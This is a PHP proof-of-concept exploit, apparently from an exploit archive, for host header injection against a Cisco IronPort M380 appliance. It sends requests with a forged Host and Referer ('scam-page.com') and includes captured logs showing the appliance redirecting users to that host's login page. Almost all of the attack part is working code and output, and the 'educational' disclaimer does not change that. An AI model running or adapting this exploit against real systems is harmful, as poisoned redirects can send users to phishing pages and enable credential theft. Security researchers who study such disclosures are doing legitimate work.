Advertisement
<?php // // Cisco Content Security Virtual Appliance M380 IronPort Remote Cross Site Host Modification Demo Exploit // // // Copyright 2019 (c) Todor Donev <todor.donev at gmail.com> // // // Disclaimer: // This or previous programs are for Educational purpose ONLY. Do not use it without permission. // The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages // caused by direct or indirect use of the information or functionality provided by these programs. // The author or any Internet provider bears NO responsibility for content or misuse of these programs // or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, // system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's // responsibility. // // Use them at your own risk! // // // [test@localhost ironport]$ php -S localhost:1337 ironport_m380.php //PHP <HIDDEN> Development Server started at Sun Sep 8 16:47:43 2019 //Listening on http://localhost:1337 //Document root is /home/test/ironport //Press Ctrl-C to quit. //* About to connect() to 192.168.1.1 port 443 (#0) //* Trying 192.168.1.1... * connected //* Connected to 192.168.1.1 (192.168.1.1) port 443 (#0) //* Initializing NSS with certpath: sql:/etc/pki/nssdb //* skipping SSL peer certificate verification //* SSL connection using TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 //* Server certificate: //* subject: //* start date: Mar 19 00:00:00 2018 GMT //* expire date: Mar 18 23:59:59 2020 GMT //* common name: //* issuer: //> GET / HTTP/1.1 //Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 //Cache-Control: no-cache //Content-Type: application/x-www-form-urlencoded; charset=utf-8 //Host: scam-page.com //Referer: scam-page.com //User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0 // //* HTTP 1.0, assume close after body //< HTTP/1.0 303 Redirecting //< Server: glass/1.0 Python/2.6.4 //< Date: Sun, 08 Sep 2019 13:47:59 GMT //< Content-Type: text/html //< X-Frame-Options: SAMEORIGIN //< Set-Cookie: sid=InCkP0xGNg7fyAqL2mAO; expires=Tuesday, 10-Sep-2019 13:47:59 GMT; httponly; Path=/; secure //< Cache-Control: no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0 //< Pragma: no-cache //< Expires: Sun, 08 Sep 2019 13:47:59 GMT //< Last-Modified: Sun, 08 Sep 2019 13:47:59 GMT //< Location: https://scam-page.com/login?CSRFKey=c17fd622-f031-f0e0-2cab-2854acb4a443&referrer=https%3A%2F%2Fscam-page.com%2FSearch //< //* Closing connection #0 //* About to connect() to 192.168.1.1 port 443 (#0) //* Trying 192.168.1.1... * connected //* Connected to 192.168.1.1 (192.168.1.1) port 443 (#0) //* skipping SSL peer certificate verification //* SSL connection using TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 //* Server certificate: //* subject: //* start date: Mar 19 00:00:00 2018 GMT //* expire date: Mar 18 23:59:59 2020 GMT //* common name: //* issuer: //> GET / HTTP/1.1 //Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 //Cache-Control: no-cache //Content-Type: application/x-www-form-urlencoded; charset=utf-8 //Host: scam-page.com //Referer: scam-page.com //User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0 // //* HTTP 1.0, assume close after body //< HTTP/1.0 303 Redirecting //< Server: glass/1.0 Python/2.6.4 //< Date: Sun, 08 Sep 2019 13:48:00 GMT //< Content-Type: text/html //< X-Frame-Options: SAMEORIGIN //< Set-Cookie: sid=NPPfo6uXJ5gPbJSPcNDE; expires=Tuesday, 10-Sep-2019 13:48:00 GMT; httponly; Path=/; secure //< Cache-Control: no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0 //< Pragma: no-cache //< Expires: Sun, 08 Sep 2019 13:48:00 GMT //< Last-Modified: Sun, 08 Sep 2019 13:48:00 GMT //< Location: https://scam-page.com/login?CSRFKey=32b0b069-34bb-1fdf-9f92-2de72a24cb65&referrer=https%3A%2F%2Fscam-page.com%2FSearch //< //* Closing connection #0 // $url = "https://192.168.1.1"; $fake_host = "scam-page.com"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_VERBOSE, true); $headers = [ 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Cache-Control: public', 'Content-Type: application/x-www-form-urlencoded; charset=utf-8', 'Host: '.$fake_host, 'Referer: '.$fake_host, 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0', ]; curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); $output = curl_exec($ch); curl_close($ch); echo $output;
Copyright ©2023 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.